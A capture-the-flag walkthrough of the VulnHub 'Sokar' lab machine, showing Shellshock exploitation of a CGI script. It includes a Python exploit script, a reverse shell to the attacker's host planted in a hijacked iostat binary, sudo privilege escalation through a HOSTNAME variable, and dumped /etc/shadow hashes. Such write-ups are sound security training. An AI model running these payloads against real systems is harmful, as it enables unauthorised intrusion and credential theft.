[Vulnhub]Sokar: 1

Sokar is created by Rasta Mouse and it also is the first competition in 2015 run by VulnHub team.

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali Linux (10.10.10.131/24)

Target: Sokar (10.10.10.145/24)

Vulnerability & Exploit

  • Shellshock (Bash bug) give attacker a way to break in and also get ROOT

Method

  • Scanned the network to discover the target server [Net Discover]
  • Port scanned the target to discover the running services and open ports [nmap]
  • Web information gathering and interacting with the web server [firefox]
  • Shellshock vulnerability detect and check [wget]
  • Analysis and write script to exploit shellshock bug
  • Poked around in the file system and found sensitive information
  • Hijack executable program to get reverse shell
  • Exploit shellshock bug to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using netdiscover as routine to detect the target’s IP address (10.10.10.145 in this case).

10.10.10.145 is our Target!

Then run NMAP scan to detect opening ports/running services on the target. From the result, found apache 2.2.15 is running on port 591 and the target OS is CentOS Linux.

nmap -sV -v -O -A -T5 -p- 10.10.10.145

Then I open iceweasel browser to have a close look at port 591.

From the content displayed, we know the server is running system command: netstat and iostat

From the source code, we found an URL: http://10.10.10.145:591/cgi-bin/cat

It’s time to try shellshock (bash bug)

After googled shellshock, I found some topics talking about how to test/exploit shellshock vulnerability in CGI. The following command is picked from one of them.

1
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.10.10.145:591/cgi-bin/cat -O /temp.txt

It works! shellshock vulnerable. Also, two users found: bynarr and apophis

Here I wrote a small python script to save my life.

sokar.py (sokar.py) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/python

import httplib
import urllib
import sys

str_usage = "Usage: %s <command>" % sys.argv[0]
str_example = "Example: %s \"/bin/cat /etc/passwd\"" % sys.argv[0]

ip = "10.10.10.145"
port = 591
uri = "/cgi-bin/cat"

if (len(sys.argv) < 2):
  print str_usage
  print str_example
  exit(0)

exp = "() { test;};echo \"Content-type: text/plain\"; echo; echo; " + sys.argv[1]

# the following exp is used to write reverse shell code into the file /home/bynarr/iostat
#exp = "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo -e '#!/bin/bash\\n/bin/bash -i >& /dev/tcp/10.10.10.131/51242 0>&1' > /home/bynarr/iostat"
print exp
headers = {"test":exp}

conn = httplib.HTTPConnection(ip, port)
conn.request("GET", uri, headers=headers)

res = conn.getresponse()
print res.status, res.reason

data = res.read()
print data

conn.close()

by using sokar.py script, I poked around the system and found something interesting.

Here we go, I got the password (fruity) for user bynarr and notice that we only can got out to port 51242 from the server.

Another notice, . has been set in environment variable $PATH, which means when run a program the system will check the current user path first. This leave us a chance to hijack the program and make a reverse shell back to my Kali.

Then I changed the exp payload in my python script to write a bash script into /home/bynarr/iostat (iostat is the hijack target).

1
exp = "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo -e '#!/bin/bash\\n/bin/bash -i >& /dev/tcp/10.10.10.131/51242 0>&1' > /home/bynarr/iostat"

Then use my script to grant the new fake iostat to executable.

Now setup NC on my Kali to listen on port 51242, after waiting for seconds, I got a shell with bynarr privilege!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@kali:~# nc -lvnp 51242
listening on [any] 51242 ...
connect to [10.10.10.131] from (UNKNOWN) [10.10.10.145] 56650
bash: no job control in this shell
[bynarr@sokar ~]$ id
id
uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)
[bynarr@sokar ~]$ pwd
pwd
/home/bynarr
[bynarr@sokar ~]$ cat /proc/version
cat /proc/version
Linux version 2.6.32-504.1.3.el6.x86_64 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-11) (GCC) ) #1 SMP Tue Nov 11 17:57:25 UTC 2014
[bynarr@sokar ~]$ ls -al
ls -al
total 48
drwxrwxrwx. 2 bynarr bynarr  4096 Jul  7 17:20 .
drwxr-xr-x. 4 root   root    4096 Dec 30  2014 ..
-rw-------. 1 bynarr bynarr  4982 Jul  7 17:13 .bash_history
-rw-r--r--. 1 bynarr bynarr    18 Feb 21  2013 .bash_logout
-rw-r--r--. 1 bynarr bynarr   178 Nov 12  2014 .bash_profile
-rw-r--r--. 1 bynarr bynarr   124 Feb 21  2013 .bashrc
-rwxr-xr-x  1 apache apache    61 Jul  7 16:09 iostat
-rwxr-xr-x  1 root   root     368 Jan 27 19:14 lime
-rw-------  1 root   root   10728 Nov 13  2014 lime.ko

I run command sudo -l to check the allowed commands for user bynarr.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[bynarr@sokar ~]$ sudo -l
sudo -l
Matching Defaults entries for bynarr on this host:
    !requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User bynarr may run the following commands on this host:
    (ALL) NOPASSWD: /home/bynarr/lime
[bynarr@sokar ~]$ sudo LANG='() { :;}; /bin/bash' /home/bynarr/lime
sudo LANG='() { :;}; /bin/bash' /home/bynarr/lime
sudo: sorry, you are not allowed to set the following environment variables: LANG

From the output, I noticed that executable program lime is owned by root but bynarr can run it.

Due to the server is vulnerable to shellshock, I use the following command (found in here) to double check if it can be exploited locally.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

1
2
3
4
[bynarr@sokar ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
< { :;}; echo vulnerable' bash -c "echo this is a test"                      
vulnerable
this is a test

Yes it is vulnerable! From the previous sudo -l output, there are couple of environment variables can be used to exploit.

Here I use variable HOSTNAME.

sudo HOSTNAME='() { :;}; /bin/bash' /home/bynarr/lime

the password for bynarr is fruity which we found it before.

Now we get ROOT!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
[bynarr@sokar ~]$ sudo HOSTNAME='() { :;}; /bin/bash' /home/bynarr/lime
sudo HOSTNAME='() { :;}; /bin/bash' /home/bynarr/lime
id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty; pty.spawn("/bin/bash")'
[root@sokar bynarr]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@sokar bynarr]# pwd
pwd
/home/bynarr
[root@sokar root]#cat /etc/shadow
cat /etc/shadow
root:$6$cWQYjirZ$rADNjUFSiHmYp.UVdt4WYlmALhMXdkg9//9yuodQ2TFfiEWlAO0J6PRKesEfvu.3dfDb.7gTGgl/jesvFWs7l0:16434:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
vcsa:!!:16386::::::
saslauth:!!:16386::::::
postfix:!!:16386::::::
sshd:!!:16386::::::
bynarr:$6$UVZfMym7$9FFtl9Ky3ABFGErQlpQsKNOmAycJn4MlSRVHsSgVupDstQOifqqu3LvGwf3wmBvmfvh0IslwMo4/mhZ3qnVrM/:16434:0:99999:7:::
apache:!!:16386::::::
apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::
[root@sokar bynarr]# cd /root
cd /root
[root@sokar root]# ls
ls
build.c  flag
[root@sokar root]# cat flag
cat flag
                0   0
                |   |
            ____|___|____
         0  |~ ~ ~ ~ ~ ~|   0
         |  |   Happy   |   |
      ___|__|___________|___|__
      |/\/\/\/\/\/\/\/\/\/\/\/|
  0   |    B i r t h d a y    |   0
  |   |/\/\/\/\/\/\/\/\/\/\/\/|   |
 _|___|_______________________|___|__
|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
|                                   |
|     V  u  l  n  H  u  b   ! !     |
| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
|___________________________________|

=====================================
| Congratulations on beating Sokar! |
|                                   |
|  Massive shoutout to g0tmi1k and  |
| the entire community which makes  |
|         VulnHub possible!         |
|                                   |
|    rasta_mouse (@_RastaMouse)     |
=====================================
2015-07-07 02:41:59 -0400